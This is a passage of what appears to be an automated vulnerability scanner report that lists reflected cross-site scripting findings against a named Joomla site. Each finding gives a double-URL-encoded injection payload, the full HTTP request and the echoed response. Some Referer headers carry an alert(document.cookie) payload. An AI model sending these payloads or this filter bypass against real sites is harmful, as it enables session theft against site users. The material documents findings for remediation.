Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:06:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 15613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos4b70f"><script>alert(1)</script>a1469d13651/71-lietuviu-kalba-joomla-16-versijai.html" />
...[SNIP]...

4.1222. http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a753%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe6f52d12d7 was submitted in the REST URL parameter 2. This input was echoed as 2a753"><img src=a onerror=alert(1)>fe6f52d12d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /joomla-naujienos/2a753%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efe6f52d12d7 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:20 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 16679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/joomla-naujienos/2a753"><img src=a onerror=alert(1)>fe6f52d12d7" />
...[SNIP]...

4.1223. http://www.lithuanianjoomla.com/joomla-sasajos.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-sasajos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61531%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed3c1aa5c518 was submitted in the REST URL parameter 1. This input was echoed as 61531"><img src=a onerror=alert(1)>d3c1aa5c518 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /61531%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed3c1aa5c518 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:36 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/61531"><img src=a onerror=alert(1)>d3c1aa5c518" />
...[SNIP]...

4.1224. http://www.lithuanianjoomla.com/joomla-saugumas.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-saugumas.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8325f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee5bd78503f0 was submitted in the REST URL parameter 1. This input was echoed as 8325f"><img src=a onerror=alert(1)>e5bd78503f0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /8325f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ee5bd78503f0 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/8325f"><img src=a onerror=alert(1)>e5bd78503f0" />
...[SNIP]...

4.1225. http://www.lithuanianjoomla.com/joomla-versijos.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/joomla-versijos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb055%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e22ae4dc4162 was submitted in the REST URL parameter 1. This input was echoed as cb055"><img src=a onerror=alert(1)>22ae4dc4162 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /cb055%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e22ae4dc4162 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:39 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/cb055"><img src=a onerror=alert(1)>22ae4dc4162" />
...[SNIP]...

4.1226. http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/kaip-idiegti-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feff1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4eee9e43b2b was submitted in the REST URL parameter 1. This input was echoed as feff1"><img src=a onerror=alert(1)>4eee9e43b2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /feff1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4eee9e43b2b HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:35 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/feff1"><img src=a onerror=alert(1)>4eee9e43b2b" />
...[SNIP]...

4.1227. http://www.lithuanianjoomla.com/kontaktai.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/kontaktai.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6faf%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec1202c31614 was submitted in the REST URL parameter 1. This input was echoed as a6faf"><img src=a onerror=alert(1)>c1202c31614 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /a6faf%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec1202c31614 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:26 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/a6faf"><img src=a onerror=alert(1)>c1202c31614" />
...[SNIP]...

4.1228. http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/lithuanianjoomlacom-misija.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f691%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e01c4d9e30e1 was submitted in the REST URL parameter 1. This input was echoed as 8f691"><img src=a onerror=alert(1)>01c4d9e30e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /8f691%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e01c4d9e30e1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:15 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 17145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/8f691"><img src=a onerror=alert(1)>01c4d9e30e1" />
...[SNIP]...

4.1229. http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/lithuanianjoomlacom-vizija.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ded%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eced0bcfe368 was submitted in the REST URL parameter 1. This input was echoed as 29ded"><img src=a onerror=alert(1)>ced0bcfe368 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /29ded%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253eced0bcfe368 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:23 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/29ded"><img src=a onerror=alert(1)>ced0bcfe368" />
...[SNIP]...

4.1230. http://www.lithuanianjoomla.com/media/system/css/system.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/media/system/css/system.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a109%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e856555f93b0 was submitted in the REST URL parameter 4. This input was echoed as 8a109"><x style=x:expression(alert(1))>856555f93b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /media/system/css/8a109%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e856555f93b0 HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:01 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/media/system/css/8a109"><x style=x:expression(alert(1))>856555f93b0" />
...[SNIP]...

4.1231. http://www.lithuanianjoomla.com/media/system/js/core.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/media/system/js/core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bc82%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224686791049c was submitted in the REST URL parameter 4. This input was echoed as 6bc82"style="x:expression(alert(1))"4686791049c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /media/system/js/6bc82%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224686791049c HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:26:44 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 16237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/media/system/js/6bc82"style="x:expression(alert(1))"4686791049c" />
...[SNIP]...

4.1232. http://www.lithuanianjoomla.com/media/system/js/mootools-core.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/media/system/js/mootools-core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7407b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea1b078a95ed was submitted in the REST URL parameter 4. This input was echoed as 7407b"><img src=a onerror=alert(1)>a1b078a95ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /media/system/js/7407b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea1b078a95ed HTTP/1.1
Host: www.lithuanianjoomla.com
Proxy-Connection: keep-alive
Referer: http://www.lithuanianjoomla.com/7-joomla-naujienosc1471%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e4fb583d3360/70-joomla-160-isleista.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:27:47 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/media/system/js/7407b"><img src=a onerror=alert(1)>a1b078a95ed" />
...[SNIP]...

4.1233. http://www.lithuanianjoomla.com/naujienos.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/naujienos.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 251c1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e1dd9a4d1eed was submitted in the REST URL parameter 1. This input was echoed as 251c1"><img src=a onerror=alert(1)>1dd9a4d1eed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /251c1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e1dd9a4d1eed HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:24 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/251c1"><img src=a onerror=alert(1)>1dd9a4d1eed" />
...[SNIP]...

4.1234. http://www.lithuanianjoomla.com/saugi-joomla.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6d5f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed51118b6c59 was submitted in the REST URL parameter 1. This input was echoed as d6d5f"><img src=a onerror=alert(1)>d51118b6c59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /d6d5f%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ed51118b6c59 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:05:44 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 13444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<base href="http://www.lithuanianjoomla.com/d6d5f"><img src=a onerror=alert(1)>d51118b6c59" />
...[SNIP]...

4.1235. http://www.lithuanianjoomla.com/saugi-joomla.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80ed3%2522%253e%253ca%253e48472f1e3b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 80ed3"><a>48472f1e3b7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /saugi-joomla.html?80ed3%2522%253e%253ca%253e48472f1e3b7=1 HTTP/1.1
Host: www.lithuanianjoomla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 2d3002958ebe475c6a8e5c841c44742a=06cd639e41fd40994f059d122e993ad7;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:04:27 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
X-Pad: avoid browser bug
Content-Length: 14438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="lt-lt" lang="lt-lt" dir=
...[SNIP]...
<link href="/saugi-joomla.feed?80ed3"><a>48472f1e3b7=1&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1236. http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.lithuanianjoomla.com
Path:	/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html

Issue detail

